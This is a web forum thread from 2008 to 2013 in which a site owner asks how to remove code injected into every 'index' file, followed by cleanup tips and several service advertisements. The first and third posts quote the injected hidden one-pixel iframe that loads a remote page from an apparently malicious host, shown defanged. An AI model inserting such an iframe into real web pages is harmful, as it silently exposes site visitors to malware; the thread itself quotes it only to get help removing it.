1. Advertising
    y u no do it?

    Advertising (learn more)

    Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

    Starts at just $1 per CPM or $0.10 per CPC.

My Website got hacked by someone

Discussion in 'Security' started by ggynmsn, Mar 11, 2008.

  1. #1
    :confused:Hi all,

    I used Hostmonster,Hostgator,DreamHost

    My website got hacked by someone and insert this code in tho file name begine with "index"

    "<iframe src='hxxp://updateservernet.cn/tank.php' width='1' height='1' style='visibility: hidden;'></iframe>"

    I try to removed this code from every file name begin "index" but it's to difficult to remove all because my website have many subdomain and subdirectory in deep directory. Please suggestion me how can I do to solved this problem

    Thank you very much
    SEMrush
     
    ggynmsn, Mar 11, 2008 IP
    SEMrush
  2. akel

    akel Guest

    Messages:
    1,024
    Likes Received:
    32
    Best Answers:
    0
    Trophy Points:
    0
    #2
    happened to me & thanks god - I had backup ready :)

    trashed all the files execpt database & reloaded the backup.

    and paid someone to fix the script. It happened to me when i used a cheap script bought from one of the forums..
     
    akel, Mar 11, 2008 IP
  3. ggynmsn

    ggynmsn Peon

    Messages:
    283
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    0
    #3
    anyone have this script "Advanced Online Search and Replace PHP Script " send me please. this script help me to remove this code "<iframe src='hxxp://updateservernet.cn/tank.php' width='1' height='1' style='visibility: hidden;'></iframe>" from all file infected and replace with space. I found this scirpt at hxxp://www.download32.com/go/22756/http%3A%2F%2Fwww.rightscripts.com%2Fdemo%2Freplace.zip/ but it's demo version and expired.
     
    ggynmsn, Mar 11, 2008 IP
  4. JakeCohen

    JakeCohen Peon

    Messages:
    358
    Likes Received:
    4
    Best Answers:
    0
    Trophy Points:
    0
    #4
    Which is why you ask somebody who knows what they're talking about to verify the scripts you buy off untrusted sources...;)

    Sorry mate, I can't really give you advice. I'm completely useless at this stuff.
     
    JakeCohen, Mar 11, 2008 IP
  5. CodyRo

    CodyRo Peon

    Messages:
    365
    Likes Received:
    15
    Best Answers:
    0
    Trophy Points:
    0
    #5
    Do you have SSH access?
     
    CodyRo, Mar 12, 2008 IP
  6. alaajo

    alaajo Peon

    Messages:
    2
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #6
    This thing happened to me too.
    I was wondering how did something like that happened till i figured that.

    Its a Host security issue and I wrote about it here:
    http://www.freelancer-id.com/content/must-know-secure-your-host

    Try to read it and follow the instructions to be sure about the security.

    wish you all good luck
     
    alaajo, Dec 22, 2009 IP
  7. niceboy

    niceboy Well-Known Member

    Messages:
    1,168
    Likes Received:
    17
    Best Answers:
    0
    Trophy Points:
    128
    #7
    try searching hotscripts for a freeware script. and if you have some programming knowledge, its very easy to code it on your own.
     
    niceboy, Dec 22, 2009 IP
  8. SecureCP

    SecureCP Guest

    Messages:
    227
    Likes Received:
    2
    Best Answers:
    0
    Trophy Points:
    0
    #8
    I'm at a complete loss as to why people still think this is an issue with their host. Have some personal accountability.

    Either way, I can remove it more than likely with ssh access.
     
    SecureCP, Dec 22, 2009 IP
  9. coolmaste

    coolmaste Peon

    Messages:
    120
    Likes Received:
    2
    Best Answers:
    0
    Trophy Points:
    0
    #9
    Your FTP credentials are compromised.

    I can help you to clean it.
     
    coolmaste, Dec 22, 2009 IP
  10. alaajo

    alaajo Peon

    Messages:
    2
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #10
    Guys,

    Download the "phpsecinfo" from PHP.net and run it on your host. It will show you the bad issues in your host and how to solve it.

    Something else,
    I am coding a secure code.. I didn't trust my self for a while, so i used Drupal to be sure.
    I got the same result. New script was added to the files later.. And new folders and files created.
    Before that I have changed my passwords. I am using iMac (no viruses).
    Note: the host i am using is (dv) on MediaTemple
     
    alaajo, Dec 23, 2009 IP
  11. ddmd

    ddmd Peon

    Messages:
    60
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    0
    #11
    Old thread, that I would like to add something. If your site got hacked, you can quickly scan it with http://sucuri.net to see where the malware is and also to monitor your site from now on (to avoid issues like that in the future).

    * a bit promotional post, but I think can help people having the same issue.
     
    ddmd, Apr 16, 2010 IP
  12. subdivisions

    subdivisions Well-Known Member

    Messages:
    1,021
    Likes Received:
    40
    Best Answers:
    1
    Trophy Points:
    145
    #12
    This is why people need to stop buying crappily coded scripts from people and just write your own stuff.
     
    subdivisions, Apr 17, 2010 IP
  13. hanuman18

    hanuman18 Peon

    Messages:
    3
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #13
    There are so many ways to attack a website, it's just not possible to cater for them all on a constant basis if you're a small company, so the next best thing is to try and cover the most commonly found holes like the ones described in this article, and hope that puts off the intended attacker.

    We use an automated file system scanner called Eyefile. It's good for detecting any kind of backdoor injection and works for any kind of website.

    It can be found here:
    http://www.website-security-tools.com/

    Hope this helps.
     
    hanuman18, Jun 7, 2010 IP
  14. aeroz1

    aeroz1 Active Member

    Messages:
    492
    Likes Received:
    2
    Best Answers:
    0
    Trophy Points:
    53
    #14
    Most hackers are "Script Kiddies" from my experience and most of the time they gain access through a script. Do you have any scripts that allow uploading?
     
    aeroz1, Jun 7, 2010 IP
  15. hanuman18

    hanuman18 Peon

    Messages:
    3
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #15
    As you know, upload scripts in PHP can be found all over the net. If you are using one of these scripts, it's not so much down to how 'well' the script is coded, it's more about how the server configuration and php.ini. is set. In general, PHP scripts are like a thin layer between the user and the server. They can try and do whatever they or their users want, but in the end what is and isn't allowed to happen by way of a PHP script is decided outside of the script itself.

    What I'm saying is that if you're using an upload script make sure you are VERY familiar with all the related server/php.ini settings first.

    The monitoring application I was referring to is for detecting scripts and other code being added to your site without your knowledge either as new files or altered existing ones.
     
    hanuman18, Jun 7, 2010 IP
  16. bStewart99

    bStewart99 Peon

    Messages:
    1
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    1
    #16
    Google finds on average 9,000 new maliocous websites every day. We are at iLockout and are here to lower that number. We specialize in google blacklist removal, and website protection on an annual basis. Not only do we fix your site the day you sign up, but scan it daily and fix and any issues as the arise. Check us out we are currently running a special for the next two weeks, simply email through our site or call (866)408-9152 ext.102 to recieve details on our specials.
     
    Last edited: Feb 5, 2013
    bStewart99, Feb 5, 2013 IP